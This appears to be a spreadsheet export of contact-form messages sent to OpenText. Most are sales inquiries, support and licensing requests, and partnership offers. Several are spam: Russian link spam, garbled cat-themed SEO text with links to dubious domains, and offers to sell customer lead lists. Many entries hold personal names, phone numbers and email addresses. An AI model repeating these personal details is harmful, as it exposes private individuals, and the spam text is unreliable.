    <t>Good Afternoon,_x000D_
_x000D_
We are a third party company working on behalf of Chase to verify employment for an individual at ACTUATE CORPORATION. As this is a verbal verification, we just have five quick questions and they can be answered over the phone. Please call 855-550-6772 and use reference 17213401. This information is time sensitive, so your prompt response is appreciated. and use reference._x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>I am unable to login at https://concur.opentext.com. The redirect happens fine but when I am using agalkin or agalkin@opentext.com with my password it won't let me in, saying "User name or password is invalid." I am sure that my password is correct because I use it fine at the number of other OT sites, like https://learning.opentext.com. Please kindly fix this issue.</t>
  </si>
  <si>
    <t>Who should I talk to about getting an overview of your solution and what the integration effort might look like? We are evaluating integrating with top composition engines as a product option/enhancement. Thanks</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;strong&gt;CatLovesSprayBottle Your browser indicates if you've visited this link&lt;/strong&gt;.&lt;br&gt; Whenmycatrollsover ,itlooks like it wants a beslly rub ... Your browser indicates if you've visited this link You need to understand what rollingoveron his back and exposing his belly actuallymeans , inCat . ... Why does mycatrollalloverthe ground when she seses me?   More results.&lt;br&gt;  _x000D_
 [url=http://old-age-cat-problems.cf/lynx-cat-pet/i-lost-my-cat-in-the-woods.html]I lost my cat in the woods[/url] [url=http://old-age-cat-problems.cf/cat-teacher/18-unique-cat-toys-canada.html]Unique cat toys canada[/url]  _x000D_
 Dobgoneforcats ? (safe, odgs,chews , bite) - - City-Data Forum Your browser indicates if you've visited this link It seems odd that there is not acatchewtopy, ... All of mycatsliked the Ba Ba Q's dog treats, they're notchewsbut they ate them.   More results.&lt;br&gt; &lt;u&gt;BestCatLitterToUse PetHelpful Your browser indicates if you've isited this link&lt;/u&gt;.&lt;br&gt;  _x000D_
stop female cat marking territory _x000D_
 _x000D_
 &lt;h4&gt;CatsThat Look Like Hitler! Your browser indicates if you've visited this link&lt;/h4&gt;.&lt;br&gt; View the bsaic CAT stock chart on Yaoho Finance. Change the date range, chart type and compare Caterpillar, Inc. aaginst other  Caterpillar Inc.: NYSE:CAT quotes &amp; news - Google Finance &lt;/u&gt;.&lt;br&gt;  _x000D_
  [url=http://old-age-cat-problems.cf/cat-from-hell/sureflap-cat-flap-training.html]Sureflap cat flap training[/url] [url=http://old-age-cat-problems.cf/pet-cat-house/odor-deterrent-for-cats-88.html]Odor deterrent for cats[/url]  _x000D_
 2 Jan 2015 ... Adding options to the previous answer, which is absolutely correct. If your cat qas a stray 10 yearrs ago, she's obviously over 10 y.o.  Ways to Stop Your Cat Peeing Outside the Litter Box  pdtMD&lt;/i&gt;.&lt;br&gt; In addition to the many other good reasons to have your cat neutered, ... If your cat doex sprayu, thoroughly clen the area to prevent  How to Stop a Neutered Cat From Spraying  Cuteness &lt;/h3&gt;.&lt;br&gt;  _x000D_
chicken  cat food homemade _x000D_
 _x000D_
&lt;h3&gt;UTI won't </t>
  </si>
  <si>
    <t xml:space="preserve">Hi there, _x000D_
_x000D_
I am looking for a new software program for information sharing between staff. A communication log of sorts. Due to our privacy policy, we cannot have any of our confidential information stored in a server outside of Canada. Do you offer any products that would work for us? </t>
  </si>
  <si>
    <t>Guidance for Rightfax 10.6 migration from Notes to Office365</t>
  </si>
  <si>
    <t xml:space="preserve">12/8/17 Request for signature on contract modification no. EEC45017C0004 </t>
  </si>
  <si>
    <t>Price Quote for OpenText Process Suite</t>
  </si>
  <si>
    <t>Hello McAffee Security Team,_x000D_
_x000D_
No captcha was used in the communication section of the page._x000D_
_x000D_
Risk factors that may occur:_x000D_
_x000D_
Thousands or millions of emails can be sent. Negative for people trying to communicate. It will also adversely affect the customer in terms of loss or satisfaction._x000D_
_x000D_
OWASP web security community recommends using captcha on form pages._x000D_
_x000D_
Affected addresses : https://www.opentext.com/who-we-are/contact-us/contact-opentext_x000D_
_x000D_
Good works :)</t>
  </si>
  <si>
    <t>Dear Sir / Madam,_x000D_
_x000D_
On the 13/12/17 I submitted an application for an advertised job: Manager, Workplace Security &amp; Safety EMEA based at Reading, UK._x000D_
_x000D_
To date I've received no acknowledgement of that application._x000D_
_x000D_
Could you please put me in touch with the recruiter for this position?_x000D_
_x000D_
Yours sincerely_x000D_
_x000D_
Arthur Rabjohn</t>
  </si>
  <si>
    <t xml:space="preserve">Sub: DP:47050 _x000D_
Requesting quote for OpenText Process SuiteHello Team,_x000D_
_x000D_
Can I please get a quote for the product description below? Your sooner response is much appreciated. _x000D_
_x000D_
End user/Shipping:  Agency: Department of the Navy_x000D_
_x000D_
Line Item(s)_x000D_
Item No	Description	Qty	Unit_x000D_
001	OpenText Process Suite Process Suite Platform Named User License (Brand Name) See "Appendix A" in Statement of Work"	1	EA_x000D_
002	OpenText Contract Center Add-on to Process Suite Participant User License (Brand Name) See "Appendix A" in Statement of Work"	1	EA_x000D_
003	Maintenance See "Appendix A" in Statement of Work"	1	LT_x000D_
004	Shipping and Handling See "Appendix B" in Statement of Work	1	LT_x000D_
Thanks &amp; Regards,_x000D_
Sandeep Sripathi_x000D_
Systems Integration, LLC (SILLC) _x000D_
 _x000D_
730 24th St NW, Suite#11, Washington DC 20037_x000D_
Tel#: (202) 792-5570 ext. 402_x000D_
Fax#: (202) 792-5572_x000D_
www.sillcdc.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>currently on RightFax 9.4, looking to upgrade to the Cloud Version</t>
  </si>
  <si>
    <t xml:space="preserve">Person (Robin Dixon) in-charge of Open Text licensing has retired. We need an updated software for Windows 10. Can someone please assist?_x000D_
_x000D_
Thanks. </t>
  </si>
  <si>
    <t xml:space="preserve">Price quote for Department of State_x000D_
OpenText Process Suite Process Suite Platform Named User License (Brand Name)_x000D_
PROCESS SUITE PROCESS PARTICIPANT USER LICENSE OpenText (BRAND_x000D_
NAME)_x000D_
MAINTENANCE_x000D_
</t>
  </si>
  <si>
    <t>our association has an Alchemy based database from 1999 which has not been used in a number of years. we are in need of accessing the files. however, when attempting to install on Windows 10, i receive an error message that it cannot be installed due to 64 bit compatibility issues. is there a compatible version of the software we can install to have access to our old database files? please contact me by email as i am not typically in our offices on a regular basis. thanx!</t>
  </si>
  <si>
    <t>Would like to learn more about your physical record management service offerings, along with scanning and indexing service offerings.</t>
  </si>
  <si>
    <t>Hi,_x000D_
We are looking to implement PDF online editor in our Web Application developed in .NET. We would like to understand whether BRAVA has a editor which can be directly integrated to Web Applications not Content Management (SharePoint)._x000D_
Please free to contact me for more details._x000D_
Thanks,_x000D_
Venkat.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Does anyone from your company want to have a quick discussion to see if we could partner over something in the future?_x000D_
_x000D_
Regards, _x000D_
_x000D_
_x000D_
Andrey Genchev_x000D_
Business Development_x000D_
Prime Holding JSC_x000D_
m: +44 1 590 700 027_x000D_
e: andrey.genchev@primeholding.com_x000D_
w: www.primeholding.com</t>
  </si>
  <si>
    <t>Our IT recently installed Brava Desktop SX on a number of laptops. The mark up menu is not showing up, is this a feature included in the version we purchased._x000D_
_x000D_
Regards_x000D_
_x000D_
John Russell_x000D_
Department of Transport, Tourism and Sport_x000D_
Iteland</t>
  </si>
  <si>
    <t>Привет всем участникам форума! прикольный у вас сайт! _x000D_
Нашел интересную базу кино:  [b] 2017 в хорошем качестве лучшие мелодрамы [/b] [url=http://kinokub.net/]http://kinokub.net/[/url] _x000D_
Тут: http://kinokub.net/komediya/3772-dobro-pozhalovat-v-pop-pop-redemption-2013.html [b] Смотреть Добро пожаловать в ПОП / Pop Redemption (2013) онлайн бесплатно [/b] _x000D_
Тут: http://kinokub.net/news/10304-besstydniki-prodleny-na-sedmoy-sezon.html _x000D_
http://kinokub.net/luchshaya-fantastika-spisok-smotret-onlayn/ [b] Лучшая фантастика 2017 онлайн [/b] _x000D_
[url=http://kinokub.net/serialy/] Новинки в хорошем качестве hd лучшие сериалы [/url] _x000D_
[url=http://kinokub.net/otechestvennyy/] Лучшие отечественные фильмы бесплатно [/url] Лучшие отечественные фильмы бесплатно</t>
  </si>
  <si>
    <t>Последние новости здесь [url=http://mybiysk.ru/]mybiysk.ru[/url]</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I hope you're doing well. I really enjoy your blog and particularly liked your piece on artificial intelligence and decision support. Great post, it's amazing how technology impacts nearly everything in life. _x000D_
_x000D_
My name is Cassie I'm from from Digital Exits. I passed your article on to our Founder, Jock Purtle, as I knew he’d enjoy it too. Jock’s an expert on doing business online, he has been featured in Forbes and contributed to numerous websites and podcasts. _x000D_
_x000D_
He asked me to get in touch as he had a couple of ideas for guest posts your readers would enjoy and get value from. Your content is awesome but it might be interesting to add a title like “How to Protect Your Business in 2018” or maybe “Why Accurate Business Can Increase the Value of Your Business”_x000D_
_x000D_
I don’t know if you accept article submissions but we’d love put it together for you. Here are a couple of samples of other articles we’ve done, so you can see the quality:_x000D_
_x000D_
https://techwyse.com/blog/website-analytics/essential-tools-assessing-websites-true-value/_x000D_
https://relevance.com/how-exit-strategies-can-help-build-your-digital-business/​_x000D_
https://blog.taxjar.com/the-quick-start-guide-to-selling-your-ecommerce-business/​_x000D_
_x000D_
Let me know what you think?_x000D_
_x000D_
Looking forward to hearing from you._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Cassie_x000D_
_x000D_
Cassie Phillips_x000D_
Marketing Associate_x000D_
DIGITAL EXITS, LLC_x000D_
w:  www.digitalexits.com   e:  cassie@digitalexits.com</t>
  </si>
  <si>
    <t>I've used Gupta Report Builder V.3.1. for many years with succes._x000D_
Recently, I've change my computer (Windows 10) and I have a problem to re-install the software._x000D_
Even with the right procedure, an error messsage with "activation key not valid" appears._x000D_
_x000D_
Could you please tell me how to fix this problem?_x000D_
Best regards,_x000D_
Raphaël</t>
  </si>
  <si>
    <t xml:space="preserve">Hallo, _x000D_
wir würden gerne unseren eingehenden Rechnungsprozess digitalisieren und würden daher gerne mehr über ihr Angebot erfahren._x000D_
_x000D_
Viele Grüße_x000D_
_x000D_
Alexander Hecking  </t>
  </si>
  <si>
    <t>Hi,_x000D_
My name is Spase Ristov and I'm currently working as an independent IT consultant with main focus in business analysis, business process modeling and EDIs. I'm very interested in OpenText and in what you do connected to supply chain and EDIs._x000D_
Please contact me on 0704468294 to discuss our potential collaboration._x000D_
Best regards,_x000D_
Spase</t>
  </si>
  <si>
    <t>Hello, I've had access to https://support.opentext.com but now it says I don't have access anymore. Could I have access to open support request cases please?_x000D_
BR, Ismo</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, for my first Login to the OpenText Connect , i could not set my initial password._x000D_
</t>
  </si>
  <si>
    <t>Hi, is it possible to get a trial version of OpenText Brava! for SharePoint. I have tried the main contact form and emailed 'rwarren@opentext.com' but had no reply</t>
  </si>
  <si>
    <t>We are looking for a trial license of Opentext, but we are unable to submit the form. Can we get a trial license please?</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
wir setzen derzeit zur Darstellung von dwg-Dateien den OpenText Brava Free dwg viewer ein. Da wir dies gerne auch nach dem 28.02.2018 tut möchten, benötigen wir ein Angebot für ein Upgrade auf Brava! Desktop DXP. Wir benötigen 100 Lizenzen._x000D_
_x000D_
Bitte kontaktieren Sie mich diesbezüglich. Vielen Dank._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Sebastian Lehmann_x000D_
Zellstoff Stendal GmbH</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Hi, Are you looking for OpenText Leads for your Marketing Campaign? Get 1,479  OpenText customer Record (2018 New Tele-interviewed file) from Belgium. _x000D_
_x000D_
Get a test file to evaluate the Quality of Customer Record. Meanwhile, let us know if you have any specific data or target request for 2018. We maintain user file for ERP, CRM, Business intelligence, Cloud, Big data and Networking segments._x000D_
_x000D_
kindly respond back for test file and additional information._x000D_
_x000D_
_x000D_
Regards,_x000D_
_x000D_
Cathy Henry_x000D_
cathy.henry@mybeta4.com_x000D_
_x000D_
*** 12 Years of business excellence ***_x000D_
*** DMA Award winner ***_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear HR Team Open Text Technologies Pvt Ltd,_x000D_
_x000D_
Greetings! from U. S. Consulate General, Hyderabad._x000D_
_x000D_
Mr. YADAV, Sandeep Kumar  is offered employed with one of the United States Government associates, has indicated his previous employment with Open Text Technologies as Advanced Software Engineer. The Consulate General solicits your assistance in enabling us to determine the applicant’s fitness and suitability for employment by verifying her employment with the organization please find attached questionnaire._x000D_
_x000D_
Please respond back to the email by fill in the below info.  You are assured that any information you provide will be held in the strictest confidence and will not be released to the applicant._x000D_
_x000D_
Your assistance in this process is much appreciated._x000D_
_x000D_
Regards_x000D_
Kiran Babu P_x000D_
Security Investigator _x000D_
U.S. Consulate General_x000D_
Hyderabad, India_x000D_
Mobile: +91 96760 03232 _x000D_
Land: +91 40 40338300_x000D_
Ext: 8345_x000D_
</t>
  </si>
  <si>
    <t>I am a Computer Programmer Analyst student at Fanshawe College looking for a co-op for the Winter term.  I am a hardworking individual passionate about my field.  I would appreciate being put in contact with someone able to discuss possible opportunities at Open Text.  I can be reached through email (m_klassen25@fanshaweonline.ca) or through phone (226-868-0448)._x000D_
_x000D_
Thank you for your time, and I look forward to hearing from someone soon._x000D_
_x000D_
Michael Klassen</t>
  </si>
  <si>
    <t>Hi, I am interested in enrolling in course 3-2201 ICC in Australia.  Does this course also cover installation of BCC ver 16 or is there another course for this._x000D_
_x000D_
Thanks_x000D_
Fatima</t>
  </si>
  <si>
    <t>The company is a legacy Dell EMC ApplicationXtender account; we used to download source and patches from support.emc.com . That site still has documentation, but no server or client source, service pack, or patch available for download. Do we get source from Opentext support now ? If i should ask somewhere else, let me know; thanks;_x000D_
Dean Pichotto_x000D_
Pacific Service Credit Union_x000D_
Concord, CA (us)_x000D_
94519_x000D_
925-609-5091 (us)</t>
  </si>
  <si>
    <t>Interested in potentially using RightFax (as a managed service) to supplement our main solution, faxing outbound PO and receive inbound vendor acknowledgements, being able to recognize discrete information in inbound documents and take workflow actions based on that information.</t>
  </si>
  <si>
    <t xml:space="preserve">THE BIO DATA     _x000D_
                                            CERTAFACAITON_x000D_
NAME. _x000D_
 .MIDDLIE _x000D_
LAST NAME  _x000D_
AGES. _x000D_
BURN_x000D_
_x000D_
 SEX.FEMALE_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">My company currently has 3 USER ID's.  I need to set up an additional  ID for our Kentucky Office. </t>
  </si>
  <si>
    <t>Hi,_x000D_
I heard great things about the OpenText Content Server and would like to introduce it to my IT department. First of all, do you have any vendors in Houston who I could get in touch with to get information about OpenText, such as main benefits, who within Energy Industry uses it, etc. Second, how much does it cost out of the box? I know it is a very broad question, but approximate cost quote will work. Thank you! Angelina</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for the quotation for Brava Reader Image only version. Can you please send me the quote and I also want to know the payment methods. Do you accept Purchase Orders? _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We are a partner and reseller of the Xtender Solutions suite of products. How can I get access to the associated downloads and knowledgebase articles? </t>
  </si>
  <si>
    <t>We are looking for a fax server that can accommodate 25 "lines".  I want people to be able to fax 25 individual employees and have the fax go directly to the appropriate employee's email automatically.</t>
  </si>
  <si>
    <t>Can't log in to My Support: OpenText Connect_x000D_
No Access_x000D_
We're sorry, your account does not grant you access to this resource.</t>
  </si>
  <si>
    <t>Hi there,_x000D_
We are a small company who may be interested in using Right Fax. We are looking for cost information on your product._x000D_
If you could send the costing information, it would be greatly appreciated._x000D_
Thanks._x000D_
Rick</t>
  </si>
  <si>
    <t>Looking to purchase BravaReader, but online purchase seems to indicate that page is not encrypted.  Are there any other ways to purchase?</t>
  </si>
  <si>
    <t xml:space="preserve"> MoreCat With Cat On  - back .Cat - backsynonyms,Cat - backpronunciation,Cat - backtranslation, English dictionary definition ofCat - back . Noun 1. exhaust system - sstem  Camp Songs - Kids Songs - Children's  05, 2011 В·What is aCat - BackExhaust System? ACat - Backsystem is an engineered exhaust system thatвЂ™s designed to improve horsepower and deliver exciting high  &lt;i&gt;Polydactyl cat - Wikipedia&lt;/i&gt;.&lt;br&gt; HowtoTrainaCattoWalk on aLeash- Vetstreet Your browser indicates if you've visited this link For outgoing and relaxed felines, one of the safest ways to explore outdoors is trainingcatstowalk on aleash . Mikkel Becker shares advice onhowtodo this.   More results.&lt;br&gt;  _x000D_
 [url=http://good-cat-repellent.ga/cat-items/56-how-to-rid-of-cat-urine-smell.html]How to rid of cat urine smell[/url] [url=http://good-cat-repellent.ga/index.html]What does cat back muffler mean[/url]  _x000D_
 &lt;i&gt;Wounds -CatBite Injuries to Humans  VCA Animal Hospital Your browser indicates if you've visited this link&lt;/i&gt;.&lt;br&gt; Do you havetwo catsin your home that just canвЂ™t seem to get along?  resolve their issues throughfighting , ... The ASPCA is a 501(c)(3)  Gradually Introduce New Cats Animal  What causes a cat fight and how do you stop yourcatsin the act or prevent yoircats fightingin the first place? Here's what to  catsare often  male cats fightingover a female -  How do I keep mytwo catsfromfightingeach otner? ... Iftwo catsarefightingwith each ther, ... I havetwo . They aretwostrays, amaloeand a  BetweenCatsin Your Household  This video 3cats fightingfor mating captured by nature  trying to mating with one female cat, thatвЂ™s why they arefighting . This is the to Deal WithAggression Between Family  There are several ways to stop or preventcatsfromfighting . Learn 5 tips to  When there aretwoor morecatsin a home  to Stop aCat Fight and Why Tehy Happen-Cats  Learn 5 tips to stopcatsfromfightingfrom Animal ... Your resident kitty probably has a favorite spot ortwofor snoozing or watching th</t>
  </si>
  <si>
    <t>I attempted the self service account creation... But, never received the "verification" email.  I've since attempted a Password reset... which did send me a eMail, which I selected and set a new password._x000D_
When I attempt to login with this new password - I get error._x000D_
_x000D_
Please review and advise._x000D_
Regards,_x000D_
Wayne Steele</t>
  </si>
  <si>
    <t>Does the tx version view, print and measure? Also, the 10 seat network, is that a floating login? Meaning, can I install it on 15 computers and the 11th person in is blocked?_x000D_
_x000D_
Thank you,_x000D_
Dean</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I work with MerlinOne, a robust, time-tested digital asset management solution for creative brands. I wanted to reach out and let you know that we’ve just released a new guide, “Evaluating Digital Asset Management Software Vendors: 50 Expert Insights on Mistakes to Avoid and Tips for Success.” Each tip is accompanied by a quote from an expert, and you’ve been included._x000D_
_x000D_
You can check out the full guide here: https://merlinone.com/evaluating-digital-asset-management-software-vendors/_x000D_
_x000D_
It would be great if you'd share this news internally and/or with your audience on social media. You can find us on Twitter @MerlinOne_Inc. _x000D_
_x000D_
Thanks so much for your time!_x000D_
_x000D_
_x000D_
Angela Stringfellow_x000D_
</t>
  </si>
  <si>
    <t>We are a long term partner with OpenText. Currently we are evaluating CCM product for one of our customer and willingly to talk to you on this (mainly Exstream and xPression). Appreciate if you can contact back at the earliest._x000D_
Regards</t>
  </si>
  <si>
    <t>I purchased a single license of Redact It last year.  The computer on which Redact was installed had some issues and the hard drive was recently wiped.  Consequently, I need to reinstall Redact It on the same computer.  The last installation was quite nightmarish so I'm hopeful that the reinstall will be easier._x000D_
_x000D_
Please let me know what documentation you need, if any.  My original receipt number is: 0042-2659-4738-1892_x000D_
_x000D_
Thanks for your assistance.</t>
  </si>
  <si>
    <t xml:space="preserve">Need support for our Captiva Capture 7.6 but the support page does not work. Please contact me. I cannot seem to contact Open Text except through this process. </t>
  </si>
  <si>
    <t>I would like to have a demo of your DAM solution._x000D_
Please contact me to setup a time.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Please could you tell me how I can get a trial of OpenText Brava! for Microsoft SharePoint 2010</t>
  </si>
  <si>
    <t>I am looking for a database solution (having used Live Link and Content Suite 10) for the last 8 years. I am now in a new opportunity that has nothing and will be starting from scratch. I will be wanting to talk about latest iterations of Live Link, and solutions you have for Technical Drawing storage and their inherent security, tracking and auditing capabilities.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
I don't have access to support.opentext,com to create service requests . My colleague (whose email id is nicki.crosswhite@dell.com ( DellEMC) has the access to support site . We used to use our site id as "5269977" . Can you please grant me with support site access . Thank you. </t>
  </si>
  <si>
    <t>1)  Any online classes that are coming up soon, and the associated dates/cost? _x000D_
2)  Any Instructor led classes (other than 2 sessions posted on your website), and the associated dates/cost? _x000D_
_x000D_
For faster response please reply back with the answers via email._x000D_
_x000D_
Thanks,_x000D_
Ali</t>
  </si>
  <si>
    <t>We are investigating Document Access for SAP and Data Archiving for SAP. We would like to know more about the possibilities.</t>
  </si>
  <si>
    <t>We are currently using a Faxpress server, but we understand it isnt compatible with anything above Exchange 2010.  We will be going to Exchange 2016 and office 365 later this year and would like to know about your cloud solution._x000D_
_x000D_
Thanks, Tim</t>
  </si>
  <si>
    <t>I need an update of BravaReader after version 16.2.0.121. Can you get me same?? Thank you in advance. Best regards and a happy newyear, Johan Brinkman</t>
  </si>
  <si>
    <t xml:space="preserve">Not able to open a support ticket and to download the last version eDocs through the My support page. The last version available is the 2015 and i cannot create a support ticket._x000D_
_x000D_
Thank you in advance </t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
I am currently in the process of sourcing a document management system for my company, and I am looking in to OpenText. Is there someone I can contact in regards to an RFP?_x000D_
_x000D_
Thank you,_x000D_
_x000D_
Kayla Peplinskie, EIT_x000D_
Documents Control Coordinator_x000D_
Rideau Transit Maintenance_x000D_
805 Belfast Rd._x000D_
Ottawa, ON K1G 0Z4_x000D_
Kayla.Peplinskie@rtmgp.ca_x000D_
613-482-9304 x 530_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Morning Guys,I tried to download license key but kept said confirm email I did many times still did same thing would you please help to download or send me email as attach._x000D_
Thanks </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I've been looking into software that can redact documents in SharePoint 2010 and came across the Redact-IT product which I believe is now called "OpenText Brava! for Microsoft SharePoint"._x000D_
_x000D_
Is it possible to get a demo version of this for us to try it out in-house?_x000D_
_x000D_
regards_x000D_
David Rhodes</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
_x000D_
Je suis en charge de la production informatique auprès du fonds d'investissement PAI Partners._x000D_
_x000D_
_x000D_
Nous recherchons actuellement une solution ECM permettant d'indexer d'une manière efficace, les fichiers de travail (Office et PDF essentiellement), ainsi que les emails, tout en respectant scrupuleusement les droits d'accès._x000D_
_x000D_
_x000D_
Merci de bien vouloir me contacter ou revenir vers moi par email._x000D_
_x000D_
_x000D_
Cordialement,_x000D_
_x000D_
Florent Coulon</t>
  </si>
  <si>
    <t>Would you be able to provide a quotation for:_x000D_
Opentext Vision and Accell licenses 10 User pack</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
My name is Maximilian Robu and I am Project Manager at eSkill Corporation_x000D_
Just to have an overview: we are a cloud testing platform (skills testing) and we_x000D_
need to enhance the reporting area, graphical reports and OpenText Information Hub seems to be a tool that might work with our platform_x000D_
_x000D_
Can you please provide pricing model for the tool?_x000D_
_x000D_
Thanks_x000D_
Maximilian</t>
  </si>
  <si>
    <t xml:space="preserve">Opentext versendet keinerlei Daten, Channel zum Server wird nicht geöffnet._x000D_
Fehler: Data Sent: 0 Bytes_x000D_
Data Received: 0 Bytes_x000D_
Wir nutzen alle dieselbe Config-File, und nutzen auf unseren Windows 7-Laptops und verwenden OpenText Version 14.0 </t>
  </si>
  <si>
    <t>Bonjour, je travail pour la société Triskalia en France, nous sommes à la recherche d'une solution de serveur de Fax pour l'année 2018.Nous aimerions avoir plus de détails sur les solutions que vous proposez ainsi que leurs coûts._x000D_
_x000D_
Cordialement Goulven CORRE</t>
  </si>
  <si>
    <t>I have a Brava! Desktop 7.3.0 license, purchased from IGC in 2015. It still works, but I needed to re-install my PC and I am looking for a way to re-activate my brava desktop licence. The Software ID: a036000000ko2cI_x000D_
Can you help me?</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
_x000D_
Hi, Are you looking for AS400 Leads for your Marketing Campaign? Get 1,490  AS400 customer Record (2018 New Tele-interviewed file) from Norway. _x000D_
_x000D_
Get a test file to evaluate the Quality of Customer Record. Meanwhile, let us know if you have any specific data or target request for 2018. We maintain user file for ERP, CRM, Business intelligence, Cloud, Big data and Networking segments._x000D_
_x000D_
kindly respond back for test file and additional information._x000D_
_x000D_
_x000D_
Regards,_x000D_
_x000D_
Cathy Henry_x000D_
cathy.henry@mybeta4.com_x000D_
_x000D_
*** 12 Years of business excellence ***_x000D_
*** DMA Award winner ***_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>we require a secure connection between our office and an external mainframe system. The third party involved has suggested the OpenText Host Explorer as our standard emulator does not support SSL v3.  _x000D_
_x000D_
As we only require one copy of this product, please could you let me know the price for a single license?_x000D_
_x000D_
Many thanks for your help_x000D_
 _x000D_
Tim Leader_x000D_
Team Leader – Mainframe Support_x000D_
Macro 4 Limited_x000D_
d: +44 1293 872062| t: +44 1293 872000   m: +44 7585 688697 www.macro4.com_x000D_
A Division of UNICOM Global_x000D_
Registered office: The Orangery, Turners Hill Road, Worth, Crawley, West Sussex, RH10 4SS</t>
  </si>
  <si>
    <t>是电风扇大师傅付多所付多所所所所所所所所所所所所所所所所所所所所所所所所所</t>
  </si>
  <si>
    <t>Модные женские советы здесь [url=http://ppfood.ru/]ppfood.ru[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Please grant me with mysupport access to download Documentum products, create a SR . Thank you. </t>
  </si>
  <si>
    <t xml:space="preserve">Hi,	_x000D_
_x000D_
We have 1,873 customer records of SAP ERP from Australia._x000D_
_x000D_
Test files will be given to review the quality._x000D_
_x000D_
Would you like me to send more information?_x000D_
_x000D_
Records are also available from USA, UK, Europe._x000D_
_x000D_
Thank you _x000D_
_x000D_
Regards,_x000D_
Lydia Donald_x000D_
 (E):- lydia.donald@zomo-online.com_x000D_
</t>
  </si>
  <si>
    <t>Hello, I've been a TeamSite technician for about 18 years and have been on the various TeamSite forums for that long (Interwoven, Autonomy, HP). I'm currently interviewing for new TeamSite contracts so wanted to sign-up as an independent to keep up-to-date. Is that OK and if so what should I enter for company etc for now?_x000D_
Thanks &amp; Regards_x000D_
Peter Johnson</t>
  </si>
  <si>
    <t>We need help with installing Opentext Rightfax 10.6 on a newly set up server.</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour,_x000D_
Nous sommes une société de conseil en système d'information basé au Cameroun. Nous apportons au quotidien une forte expertise auprès de notre clientèle._x000D_
Nous avons décidé de nous lancer dans le marché de la dématérialisation et aimerions être partenaire/représentant au Cameroun._x000D_
Merci de me contacter._x000D_
Cordialement _x000D_
</t>
  </si>
  <si>
    <t>Hi. I'm an editor with Faulkner Information Services. I've covered Documentum Records Manager in the past, but it seems nothing has changed on this product in the past year. I know OpenText acquired the Documentum product line but is Records Manager still being actively marketed? Or is it considered at end-of-life? Any information you could provide would be very helpful. Thank you!</t>
  </si>
  <si>
    <t>We're currently using a different cloud-based fax service for in-outbound faxing.  I'm curious about the costs and feasibility of the following items, using the Fax2Mail service:_x000D_
_x000D_
1.)  Porting ~60 lines from our current service to OpenText_x000D_
2.)  The monthly cost of those ~60 lines.  Almost all will receive/send less than 100 faxes per month.</t>
  </si>
  <si>
    <t>Новости компьютерного мира тут [url=http://www.hardexpert.net/]www.hardexpert.net[/url]</t>
  </si>
  <si>
    <t>eDOCS DM footer option dialog does not open.  Registry does not show Word under AppIntegration</t>
  </si>
  <si>
    <t>Interested in more information and possible trial of xPression but did not see current information on the OpenText Documentum web site.</t>
  </si>
  <si>
    <t>Interested in OpenText Case360</t>
  </si>
  <si>
    <t>Can you send me a W-9 form so that we can input into our system for any invoice payments. Contact me directly if you have any questions.</t>
  </si>
  <si>
    <t xml:space="preserve">We are unable to send out faxes via email. Our fax number is 212-486-9427. </t>
  </si>
  <si>
    <t>Последние новости здесь [url=http://kfaktiv.ru/]kfaktiv.ru[/url]</t>
  </si>
  <si>
    <t>We need to cancel our contract with OpenText GSX Catalog immediately. We are no longer using or need the services provided and can no longer afford the monthly fees. Please reply ASAP and let me know how to go about cancelling our account.</t>
  </si>
  <si>
    <t>Hello, We're expert in the ECM, WCM, DAM, CRM space, we would like to partner with OpenText in the Sales, Presales, Professional Services and other areas where we can jointly work together. Please reach out to us as early as possible. Looking forward to a long term business relationship. Thanks, Umal +1 678 661 2000</t>
  </si>
  <si>
    <t>I would like the contact information for the sales person in our region or area.  Our health care system is looking to consolidate faxing solutions into a single solution and I would like to learn more about this solution.  Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve"> Nine CommercialCatRepellents for Indoor and Outdoor Your browser indicates if you've visited this link These commrcialcatrepellents will ... veterinarian-approvedcatrepelklentspray ,catswill ... This ingeniouscatrepellent ismotionactivated and utilizes ...  /top-commercial-cat-repellents-554089 More results.&lt;br&gt; &lt;u&gt;CatCommunication: What YourCat'sBody Language Says Your browser inmdicates if you've visited this link&lt;/u&gt;.&lt;br&gt;  _x000D_
 [url=http://crazy-cat-behavior.ml/cat-stress-relief/63-cat-flea-spray-for-house.html]Cat flea spray for house[/url] [url=http://crazy-cat-behavior.ml/3d-cat-games/trainers-with-cats-on-94.html]Trainers with cats on[/url]  _x000D_
 &lt;strong&gt;CatScratchDiseaseCauses , Symptoms, Treatment - What Are ... Your browser indicates if you've visited this link&lt;/strong&gt;.&lt;br&gt; &lt;u&gt;SpayingYour Female Dog - Pros and Cons Your browser indicates if you've visited this link&lt;/u&gt;.&lt;br&gt;  _x000D_
cat food go cat _x000D_
 _x000D_
